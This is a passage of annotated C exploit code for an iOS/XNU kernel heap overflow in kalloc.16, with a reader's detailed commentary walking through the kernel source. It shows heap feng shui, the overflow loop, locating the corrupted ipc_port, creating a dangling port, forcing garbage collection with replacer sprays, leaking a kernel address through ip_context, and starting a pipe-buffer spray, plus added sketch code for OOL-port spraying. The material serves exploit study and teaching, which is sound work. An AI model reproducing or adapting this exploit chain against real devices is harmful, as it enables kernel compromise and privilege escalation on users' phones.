// the current intermediate page is either full or empty.
// this provides a challenge because fresh page's freelist's are filled semi-randomly such that
// their allocations will go from the inside to the outside:
//
// | 9 8 6 5 2 1 3 4 7 10 | <-- example "randomized" allocation order from a fresh all-free page
//
// this means that our final intermediate k.16 and ports pages will look a bit like this:
//
// | - - - 5 2 1 3 4 - - | - - - 4 1 2 3 5 - - |
// kalloc.16 ipc_ports
// if we use the overflow to corrupt a freelist entry we'll panic if it gets allocated, so we
// need to avoid that
// the trick is that by controlling the allocation and free order we can reverse the freelists such that
// the final intermediate pages will look more like this:
//
// | 1 4 - - - - - 5 3 2 | 2 5 - - - - - 4 3 1 |
// kalloc.16 ipc_ports
//
// at this point we're much more likely to be able to free a kalloc.16 and realloc it for the overflow
// such that we can hit the first qword of an ipc_port
// ↑ Wow. That's a pretty genius plan.
// free them all, reversing the freelists!
//
// By freeing them in the same order they were allocated, we create freelists that cave inward.
// This creates 240K worth of free chunks, but I think that's not enough to trigger the garbage collector, so we don't have to worry about GC.
for (int i = 0; i < next_early_kalloc; i++) {
// This will receive the message, hence, deallocating the sprayed kalloc.16 chunks.
discard_message(initial_early_kallocs[i]);
}
int HOP_BACK = kernel_page_size == 0x4000 ? 16 : 30;
// We're gonna refill those pages, because the following overflow logic requires all of the interacting kalloc.16 and ipc_port pages to be completely full, with zero free holes.
// It doesn't go all the way back to the beginning, because at the start of the heap grooming the sprays were busy filling in pre-existing random holes, so
// ideally we want the HOP_BACK page to point to a region where we're completely sure the kalloc.16 and ipc_port pages are criss-crossing. Don't go too far back or
// else we'll start picking up the initial random holes.
for (int i = 0; i < INITIAL_PATTERN_REPEATS - HOP_BACK; i++) {
for (int i = 0; i < kallocs_per_zcram; i++) {
mach_port_t p = kalloc_16();
// Almost all of these sprayed kalloc.16 chunks won't be freed and will stay in memory during the rest of the exploit
middle_kallocs[next_middle_kalloc++] = p;
}
}
// This is going to hold the overflowed, corrupted port. It is the most important port and will be abused throughout the entire exploit.
mach_port_t target_port = MACH_PORT_NULL;
// Hopping back a couple of pages, we can be pretty sure that an ipc_port page will be behind the page the current kalloc.16 freelist points into.
// The following calculates the approximate range the overwritten port lies in. The reason we know this range is that we consecutively created kalloc.16 and ipc_port pages in a fixed pattern,
// and we know exactly how many pages we have hopped back for kalloc.16 (HOP_BACK). We can calculate an approximate range for where the overwritten target ipc_port would lie, by assuming the extreme
// minimum/maximum cases for the last allocation of kalloc.16 and ipc_port before starting to hop back (i.e. case 1: the last allocated kalloc.16 is the first item in its page and the last allocated ipc_port
// is the last item in its page; case 2 is the opposite. This gives the min/max range, and that's what's being calculated below).
int first_candidate_port_index = next_middle_port - ((HOP_BACK+2)*ports_per_zcram); // 32 35 +2
int last_candidate_port_index = next_middle_port - ((HOP_BACK-2)*ports_per_zcram); // 28 25 -2
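// ↑ (Annotator's note) Worked example: on a 16K-page device, HOP_BACK = 16 and ports_per_zcram
// = 0xe0 = 224, so the window is [next_middle_port - 18*224, next_middle_port - 14*224), i.e.
// only 4*224 = 896 candidate ports to probe instead of all of the middle_ports.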
//sched_yield();
// wait a second
// this is a load-bearing sleep - this works better than sched_yield
// we want this loop to be as fast as possible, and ideally not get pre-empted
// don't remove this :)
// ↑ load-bearing? I'm not entirely sure what he means by this.
// Using my imagination, I think when the program voluntarily stops using the CPU for a (prolonged) 1 second, then once the kernel gets a timer interrupt and the task resumes,
// it moves up the priority list and hence gets more time slice from the scheduler, because it has forfeited the CPU for quite a long time. I'm gonna have to look through the
// scheduling algorithm one day to fully understand the benefits of this.
sleep(1);
// Like Ian mentioned, he wants an absolute minimum interference in heap-feng-shui during this loop. This loop seems critical to the vuln exploitation. Let's see what's going on.
for (int i = 0; i < kallocs_per_zcram; i++) {
// If you start overflowing from the edge of the last middle_kallocs, then you are most likely going to overflow into a free block. See the freed blocks :
// | 1 4 - - - - - 5 3 2 | 2 5 - - - - - 4 3 1 |
// The "-" are freed blocks. If (4) overflows, then a - will be destroyed, resulting in a panic. Therefore, we steer away to the clear by moving away -20 chunks.
mach_port_t kp = middle_kallocs[next_middle_kalloc-20-1];
next_middle_kalloc--;
// Frees a kalloc.16 chunk(for a brief moment).
discard_message(kp);
// Beautiful. Absolutely intriguing. Now let's look at the diagram again.
//
// | 1 4 - - - - - 5 3 2 | 2 5 - - - - - 4 3 1 |
// kalloc.16 ipc_ports
//
// The number are the allocated chunks, and the "-"s are freed blocks. Remember that we steered away from the edge of allocated blocks(4 and 5, etc.) by -20.
// And see the logic above and below. It's moving backwards in freeing, and it's filling the freed object again immediately(see "replacer_f").
// The order of the alloc & free logic :
// Free (3) -> do_vfs_overflow allocs kalloc.16 into (3) and overflows -> do_vfs_overflow frees the (3) kalloc.16 chunk -> kalloc_16() below refills (3)
// Now imagine what happens on each iteration of the overflow. Does the overflow ever, in any single iteration, overflow into a free chunk?
// NOT EVEN ONCE.
// It either overflows into an existing kalloc.16 chunk, or... it overflows into the very first ipc_port in the page that holds the ipc_ports!
// It never overflows in the freelist in any occasion.
// This ensures that the overflow, no matter how many times it happens, will not be harmful, and at the same time guarantees that it will overflow into one of the ipc_ports,
// because it loops "kallocs_per_zcram" times, so one of them is *bound to* overflow into an ipc_port.
//
// And also this explains why Ian is so keen to have this loop not be pre-empted. The actual overflow happens in this loop, and it happens hundreds of times, so it's best
// to have this loop not be interrupted by random kallocs by other processes.
//
// before we proceed further, we need to talk about the vulnerability and what the overflow gives us. Let's dive into this function.
do_vfs_overflow();
// realloc
//
// This combined with the above makes a perfect "safe overflow" primitive.
// Actually, we can't call this completely safe though. Consider the case where the CPU pre-empts, and another process kalloc.16's a critical object right in the place of chunk (4) before
// "replacer_f" fills it in. Then when the overflow happens on chunk (1), the critical object will be clobbered and the system will most likely panic. I am not entirely
// sure how reliable this overflow loop is since I didn't run it on a real device yet, but nevertheless, it is an awesome technique. :)
mach_port_t replacer_f = kalloc_16();
// loop through the candidate overwrite target ports and see if they were hit
// we can detect this via mach_port_kobject; if we know the name we pass it is valid
// but we get KERN_INVALID_RIGHT then we cleared the io_active bit
// ↑ Like Ian says, this is a way to check if NULL has been written to the beginning of an ipc_port object.
for (int j = first_candidate_port_index; j < last_candidate_port_index; j++){
// We don't know exactly which one of the middle_ports was overwritten, so we could just iterate through all of them, but we don't want to do that.
// We want to go through this loop as fast as possible, with a minimum number of iterations. Thankfully, we have already calculated the min/max range of the target ipc_port object above, so we only have
// to search through this range.
// In the README, Ian mentions that this loop and the above heap-preparation logic are the most problematic. That's why the spinners exist, to lower interference from other processes, but it's not completely avoidable.
// It's like a race between this process's heap feng-shui and all the rest of the processes. These kinds of situations are sometimes avoidable with creative ideas, or by targeting
// a less busy kalloc zone (if the bug can tolerate moving to another zone). This bug's nature is that it can only be triggered when "attrBufSize" is 16, hence it's tied mandatorily
// to the kalloc.16 zone. So it's unlucky for this bug, but it has to cope with that and work in an extremely busy kalloc.16 zone.
// It looks like a very interesting (and at the same time painstaking) task to enhance the reliability here, because I've experienced a few pretty exotic situations
// in the past and had to think of creative ways to overcome them (such as 2 threads racing where I don't have any control to interfere, both race-heap-feng-shuiing
// on the same heap, one of them overflowing continuously, and the process needing to survive while succeeding in the overflow into the target object).
// One thing that I might have tried is the "zalloc() timing attack" presented 3 years ago by Luca Todesco. It could help narrow down the range of the last kalloc.16 chunk on the page,
// and also the range of target ipc_port(assuming the zalloc() timing attack still works). If it does work, then I think it could also be used to determine when exactly the
// CPU has handed over execution to another task.
// Or another way is to just carefully place "sched_yield()" in the right locations within this loop, because we know when exactly free-alloc-overflow-free-fill happens on
// these lines of code, so we could actually draw out all possible scenarios where a rogue kalloc.16 allocation will race in and leave a free block in one of the kalloc.16
// chunks. If we're lucky, just fiddling around with sched_yield() here and there would do the trick.
// Or maybe... let's say there's a "free chunk storage spot" called FCP. We would spray a bunch of kalloc.16 chunks very early in the sploit, and call this FCP.
// We could determine by empirical testing the minimum schedule slice that this exploit task will be given. We would place several "sched_yield()"s so every code block
// between those "sched_yield()"s executes within that minimum schedule slice. Now before executing each "sched_yield()", we would deliberately free a couple of chunks (let's say 10)
// inside FCP so they get added to the freelist. The reason for doing this is to take care of rogue kalloc.16 allocations created by other processes.
// When another process allocates a rogue kalloc.16, it will pick up a free block within FCP. It could free it right away, or hold on to it for a little bit. When our
// exploit task picks the CPU back up, the first thing it'll do is spray 10+5 kalloc.16 blocks. This will not interfere with our middle_kallocs, because there are no free holes
// within them (actually, there are holes for very brief moments; maybe placing sched_yield() just before the creation of those free holes would work). So basically, it's
// a placeholder free-chunk storage technique that can cope with rogue allocations.
// Or maybe... you could just let the spinners constantly spray kalloc.16 chunks only while the master loop is running. This will drastically reduce the success rate of
// overflowing into an ipc_port, but at the same time it reduces rogue kalloc.16 chunks landing in the middle_kallocs. Usually when I approached a problem this way, there
// was a "sweet spot" where the success rate is high enough, and the fail rate is low enough. This kind of sweet spot technique is good for POCs, but you would have to
// tinker with it on every different device, and also it could change when the device is busy(listening to music), so it's not recommended...
// Another way to rely on luck is to just increase the number of spinner threads tenfold. Maybe that would make all the rogue allocations go away out of pure serendipity!
// Assuming this problem is solved, there is another problem. What if the ipc_port page is not right after the kalloc.16 page...? It could happen. Allocations from other processes could
// have filled up the freelist and created a new page right after our middle_kalloc page. If we were to overflow into that page and the first chunk in that page contains a
// free chunk or a critical object (i.e. its first QWORD is a vtable), then the kernel will panic. This problem is luckily easily solvable, with a bit of work. First, we need to
// assume that a chunk of any size could create that rogue page. We could, for instance, use the above-mentioned FCP technique. Create a loooooooooooooong freelist for every
// single kalloc.X that exists in the system (we could probably leave a single allocation in every page so the page doesn't get garbage collected), and then finally initiate
// the heap grooming. Now, any interfering kallocs that are not kalloc.16 or ipc_port will be placed inside that placeholder freelist, and won't disturb the
// heap grooming process. It doesn't really matter if the rogue pages get created *after* the interleaving page heap grooming, since all that's important is the kalloc.16 and
// ipc_port page order. During the overflow loop, the other allocations don't interfere in any way. Only the rogue kalloc.16 allocations are deleterious during this loop.
// So yeah, you need to deal with these problems: 1. rogue kalloc.16 alloc/free during this loop. 2. Other allocations that would mess up the page order.
// While solving these 2 problems, problem 3 might pop up. And problem 4 too...
// All of this requires a lot of empirical testing until you find a method that is reliable enough. To debug this, I would first get the kernel task port with this exploit,
// and then I would re-do this whole process right after this loop excluding the overflow part and replacing it with just a kalloc/free, then read kernel memory with
// the kernel task port and check if the allocation order is always the same. I would introduce fixes based on the above ideas or other new ideas if there is a mess-up,
// then I would re-check it, and this cycle will go on and on until the allocation order is always the same for like 50 iterations. I would do the same to solve the
// rogue kalloc.16 problem. Also, I would check if the zalloc timing attack still works because it would serve as a useful tool for various purposes.
// But still, the best way would be to totally avoid these problems altogether by using a completely different exploitation technique.(Find a kalloc.16 object where if
// the first 8 bytes are wiped out to NULL, then something useful happens...?)
// Okay enough pondering on this problem, let's move on...
mach_port_t candidate_port = middle_ports[j];
kern_return_t err;
natural_t typep = 0;
mach_vm_address_t addr = 0;
// How does this function check which ipc_port object has been overwritten? For this, we need to see the object's definition :
/*
struct ipc_port {
struct ipc_object ip_object;
struct ipc_mqueue ip_messages;
...
...
struct ipc_object {
ipc_object_bits_t io_bits;
ipc_object_refs_t io_references;
lck_spin_t io_lock_data;
};
typedef natural_t ipc_object_bits_t;
typedef natural_t ipc_object_refs_t;
typedef struct {
struct hslock hwlock;
uintptr_t type;
} lck_spin_t;
// natural_t is an unsigned int.
*/
// Now we know what is going to be overwritten.
// ipc_port->ip_object->io_bits
// ipc_port->ip_object->io_references
// We need to know what the implication is if both of these are modified to NULL. Let's follow this function into the kernel.
/*
kern_return_t
mach_port_kobject(
ipc_space_t space,
mach_port_name_t name,
natural_t *typep,
mach_vm_address_t *addrp)
{
ipc_entry_t entry;
ipc_port_t port;
kern_return_t kr;
mach_vm_address_t kaddr;
// Our ipc_space is doing fine today. Moving on
if (space == IS_NULL)
return KERN_INVALID_TASK;
kr = ipc_right_lookup_read(space, name, &entry); <- Here
if (kr != KERN_SUCCESS)
return kr;
...
...
...
#define ipc_right_lookup_read ipc_right_lookup_write
kern_return_t
ipc_right_lookup_write(
ipc_space_t space,
mach_port_name_t name,
ipc_entry_t *entryp)
{
ipc_entry_t entry;
assert(space != IS_NULL);
is_write_lock(space);
// Space is fine
if (!is_active(space)) {
is_write_unlock(space);
return KERN_INVALID_TASK;
}
if ((entry = ipc_entry_lookup(space, name)) == IE_NULL) { <- Here
is_write_unlock(space);
return KERN_INVALID_NAME;
}
*entryp = entry;
return KERN_SUCCESS;
}
ipc_entry_t
ipc_entry_lookup(
ipc_space_t space,
mach_port_name_t name)
{
mach_port_index_t index;
ipc_entry_t entry;
assert(is_active(space));
// Here, index will be a valid index that points into the ipc_space->is_table, which is an array of ipc_entry objects
index = MACH_PORT_INDEX(name);
// index is valid, it points within the table's boundaries
if (index < space->is_table_size) {
// Entry now points to an ipc_entry object within the is_table
entry = &space->is_table[index];
if (IE_BITS_GEN(entry->ie_bits) != MACH_PORT_GEN(name) ||
IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE)
entry = IE_NULL;
}
else {
entry = IE_NULL;
}
assert((entry == IE_NULL) || IE_BITS_TYPE(entry->ie_bits));
// It just returns the entry! Nothing fishy going on here
return entry;
}
*/
// This function returns the correct entry in the is_table, because all the code logic is based on the user-provided (untouched) name, and the ipc_space->is_table,
// which was never corrupted; hence nothing should impede this function's logic. The valid return value passes through and gets returned from "ipc_right_lookup_write" as well.
// Now back to "mach_port_kobject" then :
/*
// resume from here
kr = ipc_right_lookup_read(space, name, &entry);
if (kr != KERN_SUCCESS)
return kr;
// Nothing wrong here. Passes
if ((entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE) == 0) {
is_read_unlock(space);
return KERN_INVALID_RIGHT;
}
// It got the actual "ipc_port" object address here. If this were the overflown object, then things start to get interesting.
__IGNORE_WCASTALIGN(port = (ipc_port_t) entry->ie_object);
assert(port != IP_NULL);
ip_lock(port);
is_read_unlock(space);
// ip_active?
if (!ip_active(port)) {
ip_unlock(port);
return KERN_INVALID_RIGHT;
}
...
...
...
#define ip_active(port) io_active(&(port)->ip_object)
#define io_active(io) (((io)->io_bits & IO_BITS_ACTIVE) != 0)
*/
// Aha! Since "ip_object->ip_object->io_bits" has been wiped to NULL, "ip_active(port)" will be false which means the mach trap will return "KERN_INVALID_RIGHT".
// This means we can figure out which port is the corrupted one by simply checking the return value with "KERN_INVALID_RIGHT".
err = mach_port_kobject(mach_task_self(),
candidate_port,
&typep,
&addr);
if (err != KERN_SUCCESS) {
printf("found the port! %x\n", candidate_port);
target_port = candidate_port;
break;
}
}
// Stop searching. We found the corrupted port.
if (target_port != MACH_PORT_NULL) {
break;
}
}
// We're done with the most crash-sensitive heap arrangements and overflowing. Now we can relax on the CPU and stop the spinners.
// This implies the following code won't be that sensitive to exterior allocations.
stop_spinners();
// lets stash the ports we want to keep:
// we know the dangling port is about 30 loops back from the end of the middle_ports
// lets keep hold of a region about 3 loop iterations ahead of this
#define CANARY_REGION 4
// He's trying to preserve ports_per_zcram (3 pages') worth of ports, specifically ports that were allocated a little bit *after* the overflowed port.
// It becomes clear later that he's doing this because he's going to use these ports, and also other sprayed memory that is allocated waaayy after these ports.
// He doesn't want the page containing the corrupted port to be in his way when he's doing other stuff later.
int ports_to_hold = ports_per_zcram; //ports_per_zcram * 3;//0x49*3;
mach_port_t hold_ports[ports_to_hold];
for (int i = 0; i < ports_to_hold; i++) {
// This will probably be like ((3+1)*3) pages away. But keep in mind that the stashed ports will most likely span 4(not 3) pages, due to freelist randomization.
int source_index = ((INITIAL_PATTERN_REPEATS - HOP_BACK + CANARY_REGION) * ports_per_zcram) + i; // 20 10
// Stash them to use later
hold_ports[i] = middle_ports[source_index];
// These are set to null so the next loop will skip these hold_ports and not destroy them.
middle_ports[source_index] = MACH_PORT_NULL;
}
// now dump all our ports
// we can keep the early ports, we'll continue to use them for kallocs and stuff
// Free all the ports
for (int i = 0; i < next_middle_port; i++) {
mach_port_t port = middle_ports[i];
// Skip the stashed ports from the previous loop
if (port == MACH_PORT_NULL) {
continue;
}
if (port == target_port) {
// Cause the target port to be freed but leave us a dangling entry in the port table
// note that the port isn't active so we need a code path which will take and drop a reference
// but won't do anything if the port isn't active (like trying to give us a DEAD_NAME)
int new_size = 100;
// ↑ Like Ian says, he's trying to create a dangling port, where the actual ipc_port object is freed, but the port's ipc_entry in ipc_space->is_table still holds the address of the ipc_port object.
// We need to scavenge through the kernel source code to see if such a construct exists, and Ian has found one: "mach_port_set_attributes". Let's dig into the source code.
/*
kern_return_t
mach_port_set_attributes(
ipc_space_t space,
mach_port_name_t name,
int flavor,
mach_port_info_t info,
mach_msg_type_number_t count)
{
ipc_port_t port;
kern_return_t kr;
...
...
...
// It falls into this switch case
case MACH_PORT_DNREQUESTS_SIZE: {
// We've set this correctly in userspace.
if (count < MACH_PORT_DNREQUESTS_SIZE_COUNT)
return KERN_FAILURE;
// It is a valid name. We haven't fiddled with it in userspace.
if (!MACH_PORT_VALID(name))
return KERN_INVALID_RIGHT;
// What's going on in here?
kr = ipc_port_translate_receive(space, name, &port);
if (kr != KERN_SUCCESS)
return kr;
kr = ipc_port_request_grow(port, *(int *)info);
...
...
...
#define ipc_port_translate_receive(space, name, portp) \
ipc_object_translate((space), (name), \
MACH_PORT_RIGHT_RECEIVE, \
(ipc_object_t *) (portp))
kern_return_t
ipc_object_translate(
ipc_space_t space,
mach_port_name_t name,
mach_port_right_t right,
ipc_object_t *objectp)
{
ipc_entry_t entry;
ipc_object_t object;
kern_return_t kr;
// We've looked at this previously. It returns the ipc_entry corresponding to the port name within the is_table.
kr = ipc_right_lookup_read(space, name, &entry);
if (kr != KERN_SUCCESS)
return kr;
// MACH_PORT_RIGHT_RECEIVE is passed here. Nothing wrong. passes
if ((entry->ie_bits & MACH_PORT_TYPE(right)) == MACH_PORT_TYPE_NONE) {
is_read_unlock(space);
return KERN_INVALID_RIGHT;
}
// It gets the real address of the ipc_port object. As a reminder, its first 8 bytes have been corrupted to NULL.
object = entry->ie_object;
assert(object != IO_NULL);
io_lock(object);
is_read_unlock(space);
// Returns the object
*objectp = object;
return KERN_SUCCESS;
}
// Okay now back to mach_port_set_attributes
...
...
kr = ipc_port_translate_receive(space, name, &port);
if (kr != KERN_SUCCESS)
return kr;
// Dive into here
kr = ipc_port_request_grow(port, *(int *)info);
...
...
// This is a pretty long function. I've snipped some parts for brevity.
kern_return_t
ipc_port_request_grow(
ipc_port_t port,
ipc_table_elems_t target_size)
{
ipc_table_size_t its;
ipc_port_request_t otable, ntable;
// Uh oh. Is the kernel going to panic? No. When building release builds, the MACH_ASSERT macro is unset.
//
// #else / * MACH_ASSERT * /
// #define assert(ex) ((void)0)
// #define assert_static(ex) do {} while (0)
//
// All asserts are therefore muted.
assert(ip_active(port));
...
...
...
// Code logic here is completely unaffected by our corrupted ipc_port->ip_object->io_bits/io_references
...
...
...
// Now look at this! This seems subtle, but remember that "ipc_port->ip_object->io_references" was overwritten with NULL. Hence, after this ip_reference(), the reference count is 1.
ip_reference(port);
ip_unlock(port);
...
...
// Here's the most relevant part. Since "ipc_port->ip_object->io_bits" is NULL, "ip_active(port)" is false and this will fall through to the else case.
if (ip_active(port) && (port->ip_requests == otable) &&
((otable == IPR_NULL) || (otable->ipr_size+1 == its))) {
...
...
...
} else {
ip_unlock(port);
// This. It decreases the reference count. But remember the reference count is currently 1? So it'll drop down to 0 and the ipc_port object will be freed(by "io_free" if you dig into the function)!
ip_release(port);
it_requests_free(its, ntable);
}
// Huh...? "ip_active(port) == false" is a pretty notable error condition, but nevertheless, it returns KERN_SUCCESS.
return KERN_SUCCESS;
}
// And finally, "mach_port_set_attributes", returns KERN_SUCCESS.
*/
kern_return_t err = mach_port_set_attributes(mach_task_self(), target_port, MACH_PORT_DNREQUESTS_SIZE, (mach_port_info_t)&new_size, sizeof(int));
// As mentioned above, if everything worked as expected, then "KERN_SUCCESS" should be returned, and the corrupted ipc_port should be freed.
// Even if it's freed, there's still the address of the corrupted(but now freed) ipc_object stored in ipc_space->is_table.
// That dangling port can be looked up, and various functions can act on the (now freed) ipc_object that lies somewhere in the memory.
// Also, one thing to note: by freeing this last target port, the 3 pages containing it are now completely free and can be garbage collected.
if (err != KERN_SUCCESS) {
printf("mach_port_set_attributes failed %s\n", mach_error_string(err));
} else {
printf("freed the port\n");
}
} else {
// Destroy all the other "middle_port" ipc_port objects that we used to set up the criss-cross kalloc.16 & ipc_port pages...
// ... except the 3 pages' worth of middle ports stashed in hold_ports.
mach_port_destroy(mach_task_self(), port);
}
}
// 150MB
#define N_COLLECTABLES 3
// I think it's doing this because the total amount of freed memory needs to reach a certain threshold (150MB...?) to trigger the garbage collector.
// The math: 3 holder ports * 400 messages * 0x3e descriptors * 0x800 bytes per descriptor comes out to roughly 150MB of kalloc.0x800 chunks, freed all at once below.
mach_port_t collectable_ports[N_COLLECTABLES];
for (int i = 0; i < N_COLLECTABLES; i++) {
collectable_ports[i] = hold_kallocs(0x800, 0x3e, 400, MACH_PORT_NULL, NULL);
}
// Freeing the sprayed kallocs. Now more than 150MB of chunks are freed.
for (int i = 0; i < N_COLLECTABLES; i++) {
mach_port_destroy(mach_task_self(), collectable_ports[i]);
}
// choose a port from the middle of the holder range as our canary:
// If you think about it for a second, hold_ports[ports_to_hold] is exactly (3+1)*3 pages away from the corrupted target port (which is at the start of its page),
// and due to the "caving in" characteristic of the freelist, "hold_ports[ports_to_hold/2]" will most likely be somewhere in the middle of its page, not right next to the boundaries (the start or end).
// Is there a reason why he chose a port that's not on the boundary? Let's keep reading the code to see why.
mach_port_t canary_port = hold_ports[ports_to_hold/2];
mach_port_insert_right(mach_task_self(), canary_port, canary_port, MACH_MSG_TYPE_MAKE_SEND);
// now try to cause the GC by allocating many copies of the replacer object:
// the goal is to get the canary port overlapping the ip_context field of the dangling port
// Wow. It's trying to abuse the fact that our target corrupted port is at the beginning of its page. It's trying to replace the entire page (0x200 * 8 = 0x1000)
// that the corrupted ipc_port resides in, by garbage collecting it and replacing it with a new page of controlled/sprayed content. It places a specific
// value at index KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT. Considering that the kernel still sees that address as an ipc_port object, that offset corresponds
// to the "ipc_port->ip_context" member. Also, we don't know what the 0x3000 ipc_port page was originally aligned to, so it just sprays everything in
// 0x1000-sized chunks; no matter what the alignment used to be, a replacer_object page will land neatly right on top of the target corrupted ipc_port.
// We're storing the canary_port port name to a specific offset, and because we're going to send it to the kernel via OOL messages, it's going to be converted
// in kernel into the real address of the canary_port's ipc_port object.
mach_port_t replacer_object[0x200] = {0};
replacer_object[koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)/8] = canary_port;
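// To make the mechanism above concrete, here is a minimal sketch(illustrative only, NOT the actual
// hold_kallocs() used in this file; names and error handling are made up) of how a single OOL-ports
// spray message could be built. While such a message sits unreceived on the destination's queue, the
// kernel side keeps a kalloc buffer of count * 8 bytes where every non-NULL entry is the kernel
// address of the named port's ipc_port:
/*
struct ool_ports_msg {
    mach_msg_header_t hdr;
    mach_msg_body_t body;
    mach_msg_ool_ports_descriptor_t ool_ports;
};

void spray_ool_ports_once(mach_port_t dest, mach_port_t* ports, mach_msg_size_t count) {
    struct ool_ports_msg msg = {0};
    msg.hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
    msg.hdr.msgh_size = sizeof(msg);
    msg.hdr.msgh_remote_port = dest;       // a port we hold a receive right for
    msg.body.msgh_descriptor_count = 1;
    msg.ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
    msg.ool_ports.address = ports;         // userspace array of port names
    msg.ool_ports.count = count;           // kernel kallocs count * sizeof(ipc_port_t) bytes
    msg.ool_ports.deallocate = 0;
    msg.ool_ports.copy = MACH_MSG_PHYSICAL_COPY;
    msg.ool_ports.disposition = MACH_MSG_TYPE_MAKE_SEND;   // we own receive rights for the sprayed ports
    kern_return_t kr = mach_msg(&msg.hdr, MACH_SEND_MSG, sizeof(msg), 0,
                                MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    if (kr != KERN_SUCCESS) printf("ool spray failed: %s\n", mach_error_string(kr));
}
*/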
// the replacer object allocation is a 0x1000 alloc
// using the same maths as above lets allocate 200 MB of them,
// slowly, hoping to cause GC:
//int n_gc_ports = 200;
// ↑ 250 seemed to work better for him than 200. This value might have to be tweaked(presumably increased) if this part doesn't work correctly.
int n_gc_ports = 250; // 200
mach_port_t gc_ports[n_gc_ports];
for (int i = 0; i < n_gc_ports; i++) {
// This is like 1MB worth of kalloc. 250 iterations would create 250MB worth of allocations.
// I didn't read the kalloc source, but I guess the GC initiates only in the event of new allocation, not freeing. So one of these is going to trigger the GC
// kernel thread. The GC is going to collect the pages that have "all free chunks", and not bother with pages that have at least 1 allocated chunk in them.
// The collected pages can later be assigned to new kalloc.x chunks, should the specific kalloc.x run out of free chunks and request a new page. This way
// we can actually take over pages from special zones, such as the ipc_port zone that we're trying to replace.
// One thing that puzzles me is: does the new size category of hold_kallocs not introduce new sizes of kmsg objects? We haven't prepared for those, so if
// they get allocated, then they might accidentally take the place of our corrupted target object, instead of the replacer_object. I don't know for sure.
gc_ports[i] = hold_kallocs(0x1000, 0x1f, 8, MACH_PORT_NULL, replacer_object);
printf("gc tick %d\n", i);
// The GC thread actually needs to run. Hopefully the forfeited execution will be handed over to the GC.
pthread_yield_np();
// As an extra measure, because some time is needed for the GC to traverse through the completely free pages and add them to the completely free page list(or tree?)
usleep(10000);
}
// Hopefully the GC has collected the free page containing our corrupted port, and it has been replaced with the replacer_object's 0x1000 bytes of data.
// It's highly likely because we deliberately created 150 MB of free pages, but shortly after, sprayed *250 MB* worth of pages again. Unless the system already had
// more than 100MB of completely free pages to begin with, the target page was most likely replaced.
printf("did that trigger a gc and realloc?\n");
// if that worked we should now be able to find the address of the canary port:
uint64_t canary_port_kaddr = 0;
kern_return_t err;
// We need to keep in mind that the ipc_entry at our process's ipc_space->is_table[corrupted port's index] still contains our corrupted ipc_port object's absolute address,
// despite the fact that our object has been purposefully freed by "mach_port_set_attributes". This is going to be abused throughout the entire exploit.
// Now it's calling "mach_port_get_context" on the dangling port. Wouldn't it make the kernel immediately panic? By the way, the ipc_port object(which is now replaced with "replacer_object")
// has all members zeroed out, except for one single member : "ipc_port->ip_context". Let's see what's happening inside this function.
/*
kern_return_t
mach_port_get_context(
ipc_space_t space,
mach_port_name_t name,
mach_vm_address_t *context)
{
ipc_port_t port;
kern_return_t kr;
// passes
if (space == IS_NULL)
return KERN_INVALID_TASK;
// passes
if (!MACH_PORT_VALID(name))
return KERN_INVALID_RIGHT;
// We've already seen this gracefully pass, so from now on we can ignore this function and assume that our corrupted port's absolute address will be safely returned.
kr = ipc_port_translate_receive(space, name, &port);
if (kr != KERN_SUCCESS)
return kr;
// This is zero. It falls into the else case
if (port->ip_strict_guard)
*context = 0;
else
// Wow! The ipc_port->ip_context value is directly returned to userspace.
*context = port->ip_context;
ip_unlock(port);
// And there is no sanity check or anything that panics the kernel. How convenient!
return KERN_SUCCESS;
}
*/
// Now we understand what this is trying to do. It's trying to get the kernel address of the canary_port ipc_port object.
// This convenience function is going to be abused a couple more times in the future.
err = mach_port_get_context(mach_task_self(), target_port, &canary_port_kaddr);
if (err != KERN_SUCCESS) {
printf("error getting context from the target port (but no panic...): %s\n", mach_error_string(err));
}
printf("the canary port is at %016llx\n", canary_port_kaddr);
// lets modify the port so we can detect when we receive the message which has the OOL_PORTS descriptor which
// overlaps the dangling target port:
// we should be a bit more careful doing this to not go off the end:
// ↑ Like Ian says, it's modifying the fake_canary's ipc_port object address to point to the object right after it. 0xa8 is the exact size of a single ipc_port object.
// Aha! So this is why he tried to cherry pick a port that wasn't on a page boundary. It's trying to replace it with the port that sits right after it in memory.
uint64_t fake_canary_kport_addr = canary_port_kaddr + 0xa8;
// It's overwriting a single port address(the canary ipc_port) in the OOL ports array with the next object's address. For what reason?
err = mach_port_set_context(mach_task_self(), target_port, fake_canary_kport_addr);
// lets build the contents of the pipe buffer
// we're gonna hope that we can get this allocated pretty near the canary port:
// This isn't really used
size_t pipe_buffer_size = 0xfff; // this is for kalloc.4096
// It's allocating space to hold data that's going to be passed into a pipe.
// Why and how would pipes create kalloc buffers? To understand that, you need to follow the kernel source code :
//
// pipe(proc_t p, __unused struct pipe_args *uap, int32_t *retval){
// ...
// ...
// ...
// rpipe->pipe_peer = wpipe; // From here, you can understand how the kernel pipe is set up. The most important members are these.
// wpipe->pipe_peer = rpipe;
// ...
//
// And now the pipe writing part :
// - write(struct proc *p, struct write_args *uap, user_ssize_t *retval)
// - write_nocancel(struct proc *p, struct write_nocancel_args *uap, user_ssize_t *retval)
// - dofilewrite(vfs_context_t ctx, struct fileproc *fp, ...
// - if ((error = fo_write(fp, auio, flags, ctx))) { ...
// - pipe_write(struct fileproc *fp, struct uio *uio, __unused int flags, ...
// - pipe_size = choose_pipespace(wpipe->pipe_buffer.size, wpipe->pipe_buffer.cnt + orig_resid);
// ...
// ...
// - error = pipespace(wpipe, pipe_size);
//
// And in pipespace() you will find a sweet kalloc.
// if ((buffer = (vm_offset_t)kalloc(size)) == 0 )
//
// Actually, choose_pipespace() rounds the request up to a pipe-manageable size, and our 0xfff write fits nicely into the 0x1000 size category.
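// Summarizing the chain above as a minimal sketch(illustrative; the real loop further down also
// stashes the fds away): a single nonblocking pipe whose buffer acts as a controlled kalloc.4096 chunk.
/*
int fds[2] = {0};
pipe(fds);                                        // sets up rpipe/wpipe as shown above
fcntl(fds[1], F_SETFL, fcntl(fds[1], F_GETFL) | O_NONBLOCK);
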